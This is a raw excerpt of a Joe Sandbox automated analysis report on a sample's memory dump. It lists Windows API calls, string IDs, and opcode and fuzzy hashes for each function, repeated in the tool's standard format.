                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$MoveWindow
                                                                                                                • String ID: Listbox
                                                                                                                • API String ID: 3315199576-2633736733
                                                                                                                • Opcode ID: 01a86e31f9db3cab63e50afc1706fb8902181288ea7dead25bb4e708f9901c96
                                                                                                                • Instruction ID: 9c6058fe061f49b861be60590cf0ce7fb13f53d006165e9670fe008c1206d841
                                                                                                                • Opcode Fuzzy Hash: 01a86e31f9db3cab63e50afc1706fb8902181288ea7dead25bb4e708f9901c96
                                                                                                                • Instruction Fuzzy Hash: 2821D432610218BFEF118F64CC85FBB7BAAEF8A754F018124F9449B190C6719C52CBB0
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00DAA27B
                                                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00DAA290
                                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00DAA29D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: msctls_trackbar32
                                                                                                                • API String ID: 3850602802-1010561917
                                                                                                                • Opcode ID: 1961d052552360bfdf9b01b2391659cfdd4337fd371a7fe267105e1335a04294
                                                                                                                • Instruction ID: 0fa1b4a6100cb44f089812acd2249b7b44ac85056bd6babbd20797e35fb39096
                                                                                                                • Opcode Fuzzy Hash: 1961d052552360bfdf9b01b2391659cfdd4337fd371a7fe267105e1335a04294
                                                                                                                • Instruction Fuzzy Hash: 9F110671240308BFEF245F65CC46FA73BA9EF89B54F024219FA45A6090D372E861CB74
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00D63028,?), ref: 00D62F79
                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00D62F80
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: RoInitialize$combase.dll
                                                                                                                • API String ID: 2574300362-340411864
                                                                                                                • Opcode ID: 2f93235b68733dc4d19def2fc2e1721fedab300ebae11896b210bc6d7188147a
                                                                                                                • Instruction ID: 4c1016ba2a68a4fe633c44936bd2425a17a047a0b27379eb147dc2cd5fd8420a
                                                                                                                • Opcode Fuzzy Hash: 2f93235b68733dc4d19def2fc2e1721fedab300ebae11896b210bc6d7188147a
                                                                                                                • Instruction Fuzzy Hash: 2CE01AB0695302AFDB105F77EC49F253666AB10706F048028F106E21A0CBB64088DF28
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00D62F4E), ref: 00D6304E
                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00D63055
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: RoUninitialize$combase.dll
                                                                                                                • API String ID: 2574300362-2819208100
                                                                                                                • Opcode ID: 7b4ad7f989cbb77c96e136ba5bdd19b734e9beea8b942351d0bd9f044910e267
                                                                                                                • Instruction ID: d1d34e00fdca5a51f845bf0447dc2e162312036a4ae12c3c50f288ee122a56f6
                                                                                                                • Opcode Fuzzy Hash: 7b4ad7f989cbb77c96e136ba5bdd19b734e9beea8b942351d0bd9f044910e267
                                                                                                                • Instruction Fuzzy Hash: CAE0B6B0646302AFDB205F62ED0DB153A65F714712F184028F209E22B4CBB64548CB38
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LocalTime__swprintf
                                                                                                                • String ID: %.3d$WIN_XPe
                                                                                                                • API String ID: 2070861257-2409531811
                                                                                                                • Opcode ID: 420f201a8c5a78803960308cbe48eec6f227e99f4d97719b6eb17513391b6b7c
                                                                                                                • Instruction ID: 9783b4f0b50360798cecb8555ce4ad696fc889af28b8332db79d03f92a119852
                                                                                                                • Opcode Fuzzy Hash: 420f201a8c5a78803960308cbe48eec6f227e99f4d97719b6eb17513391b6b7c
                                                                                                                • Instruction Fuzzy Hash: 60E0EC71C0811CEACA6496908C069FA737CAB04310F108493BD97D2040E7B5DB58AB31
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00D5E6D9,?,00D5E55B,00DDDC28,?,?), ref: 00D5E6F1
                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00D5E703
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: IsWow64Process$kernel32.dll
                                                                                                                • API String ID: 2574300362-3024904723
                                                                                                                • Opcode ID: daab647a15d53060a76f1d69c6b4a38a50dfa95fd127f51536638c250fbc5721
                                                                                                                • Instruction ID: eb07a021c752e542eb21b39a614b73f2d98123d253ecd8b2d026c169b6f16ffc
                                                                                                                • Opcode Fuzzy Hash: daab647a15d53060a76f1d69c6b4a38a50dfa95fd127f51536638c250fbc5721
                                                                                                                • Instruction Fuzzy Hash: FED0A9344403138FDB243F21EC4CA633BE8BB08306B29842EFDA5D2250DBB0C8888A30
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00D5E69C,74DF0AE0,00D5E5AC,00DDDC28,?,?), ref: 00D5E6B4
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00D5E6C6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                • API String ID: 2574300362-192647395
                                                                                                                • Opcode ID: 44cf20f4c1e8848fef8e47894da2e4773995aa47521ea49c3feae5573e751f90
                                                                                                                • Instruction ID: dd6c048a23faad050a057e741f42cbaa74e83c956fa37c1104c8f276a108eee7
                                                                                                                • Opcode Fuzzy Hash: 44cf20f4c1e8848fef8e47894da2e4773995aa47521ea49c3feae5573e751f90
                                                                                                                • Instruction Fuzzy Hash: A0D0A7344403238FDB207F31EC08A2237E4AB24306B19982DFD59D1260D770C4848630
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00D9EBAF,?,00D9EAAC), ref: 00D9EBC7
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00D9EBD9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                • API String ID: 2574300362-1816364905
                                                                                                                • Opcode ID: c03b5f3529840aa017b0060043e99479698ba00cdb2b75bd41f93a26f1a48ab6
                                                                                                                • Instruction ID: 6e2724b000ab91f761ee47e42a3d856263e5b4cda0e402b7752f662980a04a85
                                                                                                                • Opcode Fuzzy Hash: c03b5f3529840aa017b0060043e99479698ba00cdb2b75bd41f93a26f1a48ab6
                                                                                                                • Instruction Fuzzy Hash: 11D0A7344043138FDB205F31EC48E1637E4AF08318B29C42DF556D2250DBB0D8808670
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00D81371,?,00D81519), ref: 00D813B4
                                                                                                                • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00D813C6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                • API String ID: 2574300362-1587604923
                                                                                                                • Opcode ID: 5b27354e529dd66613c4270baaac1dd201e84ccc24e3243fa1df326417adf414
                                                                                                                • Instruction ID: e31524d0a79a1c2295a78dacf7166cf6d59a36d8685b4dcb8f28e98f122f97f5
                                                                                                                • Opcode Fuzzy Hash: 5b27354e529dd66613c4270baaac1dd201e84ccc24e3243fa1df326417adf414
                                                                                                                • Instruction Fuzzy Hash: EBD0A734400313AFD7201F25EC08A1136EDAF40305F09842DE555D1660DA70C4898730
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(oleaut32.dll,?,00D8135F,?,00D81440), ref: 00D81389
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00D8139B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                • API String ID: 2574300362-1071820185
                                                                                                                • Opcode ID: ed167269c3074123c8aac3e0ac8932aa0239df89eb98536b074fe9233078a171
                                                                                                                • Instruction ID: 22faa3973130a288604857494a611f50ef85004e8e859ab9a7dd3a7c6751c9f2
                                                                                                                • Opcode Fuzzy Hash: ed167269c3074123c8aac3e0ac8932aa0239df89eb98536b074fe9233078a171
                                                                                                                • Instruction Fuzzy Hash: 5CD0A7348007139FD7203F25EC08B5136D8AF04305F0E842EE585D1650DA70C48D8730
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00DA3AC2,?,00DA3CF7), ref: 00DA3ADA
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DA3AEC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                • API String ID: 2574300362-4033151799
                                                                                                                • Opcode ID: dbcb3a279139fdb95664630fffe79848f5b8dc610b42b79d06a3ab8f35c5fe26
                                                                                                                • Instruction ID: f06cfe9e6cfbf2874798deade24ca7018183a5facbddde6cebc56213ac0e214f
                                                                                                                • Opcode Fuzzy Hash: dbcb3a279139fdb95664630fffe79848f5b8dc610b42b79d06a3ab8f35c5fe26
                                                                                                                • Instruction Fuzzy Hash: 61D0A930401B238FD7209F26EC0DA9236E9AF12314B09842DF5D5D2250EFF0C8C08A70
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00D43EBB,?,00D43E91,?), ref: 00D43ED3
                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D43EE5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                • API String ID: 2574300362-1355242751
                                                                                                                • Opcode ID: 9601f64fd3de1a7240e8d4b54be938c9a180eb8d598e44441086f540779ce379
                                                                                                                • Instruction ID: 8caafc3449a2e0c9a76caaf19479b570fa4da6457265621437a5f8950b76a267
                                                                                                                • Opcode Fuzzy Hash: 9601f64fd3de1a7240e8d4b54be938c9a180eb8d598e44441086f540779ce379
                                                                                                                • Instruction Fuzzy Hash: 77D0A93440231B8FD7209F2AEC09A3276E9EB04308B1A843EF989D2250DBB0C880CB30
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00D9BF4B,00000001,00D9BB7A,?,00DDDBF0), ref: 00D9BF63
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00D9BF75
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                • API String ID: 2574300362-199464113
                                                                                                                • Opcode ID: 009ae05c6306e0389c48805afd4e243770117cb3e172d3db612ff19e898d8bbc
                                                                                                                • Instruction ID: c8d2ae66ce64212922eb2e8593bd5bbafc27539d070852c2e58cb07fd48a0e4c
                                                                                                                • Opcode Fuzzy Hash: 009ae05c6306e0389c48805afd4e243770117cb3e172d3db612ff19e898d8bbc
                                                                                                                • Instruction Fuzzy Hash: 19D0A93444831BCFDB205FB5FE49A2236EAEF14325B1A846FE585D2250DBB0E8808A30
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00D43FAD,00D43F28,?,00D43F78,?,00D43FAD,?,?,?,?,00D434E2,?,00000001), ref: 00D43F40
                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D43F52
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                • API String ID: 2574300362-3689287502
                                                                                                                • Opcode ID: 659b32488896672e86566574bec4632cf8c6f08d2aab0d3e698895557cc33c7c
                                                                                                                • Instruction ID: 45247c8c280ba7b7ceac38787f005738e7e290a0bbe1dec1f07f2ec3f6242ecb
                                                                                                                • Opcode Fuzzy Hash: 659b32488896672e86566574bec4632cf8c6f08d2aab0d3e698895557cc33c7c
                                                                                                                • Instruction Fuzzy Hash: 66D0A734818313CFD7201F25EC18A2177F4AF04308B19882DE649D1250D7B0CA8C8A30
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 11bf9a339061f87263405e28e1200be784ce3d586584e1a73b54c7661f9aa393
                                                                                                                • Instruction ID: 221ee121f28dbe9dddb7622bd857d70e99cdc7275f518f00924f835c1d4685b5
                                                                                                                • Opcode Fuzzy Hash: 11bf9a339061f87263405e28e1200be784ce3d586584e1a73b54c7661f9aa393
                                                                                                                • Instruction Fuzzy Hash: FEC15175A00216EFCB14CFA8C984EAEB7B5FF88704F148599E945EB251E730DE41CB61
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00D96AA6), ref: 00D4AB2D
                                                                                                                • _wcscmp.LIBCMT ref: 00D4AB49
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper_wcscmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 820872866-0
                                                                                                                • Opcode ID: 17d04a49f724b4d5c3cb02a70930ed80cb1d41862f664b006b0f9ade98855e69
                                                                                                                • Instruction ID: f9eb9dc1ffe6c53df2771d64e7273244e4ddf9e087b0f09d8904bd71457bcd43
                                                                                                                • Opcode Fuzzy Hash: 17d04a49f724b4d5c3cb02a70930ed80cb1d41862f664b006b0f9ade98855e69
                                                                                                                • Instruction Fuzzy Hash: 57A1E375B4020ADBDB14DF69E9816BDBBA5FF48300F64416AEC56C72A0DB30D860C7B2
                                                                                                                APIs
                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 00DA0D85
                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 00DA0DC8
                                                                                                                  • Part of subcall function 00DA0458: CharLowerBuffW.USER32(?,?,?,?), ref: 00DA0478
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00DA0FB2
                                                                                                                • _memmove.LIBCMT ref: 00DA0FC2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 3659485706-0
                                                                                                                • Opcode ID: 7e9b75399d80be10e5a28efb09aeafa1835698b16d313a78dcb4361a05215335
                                                                                                                • Instruction ID: adbf3bcb3e75745e7d698183c1b0acad17926d6e1050f9a1f1aeb76368a0fd55
                                                                                                                • Opcode Fuzzy Hash: 7e9b75399d80be10e5a28efb09aeafa1835698b16d313a78dcb4361a05215335
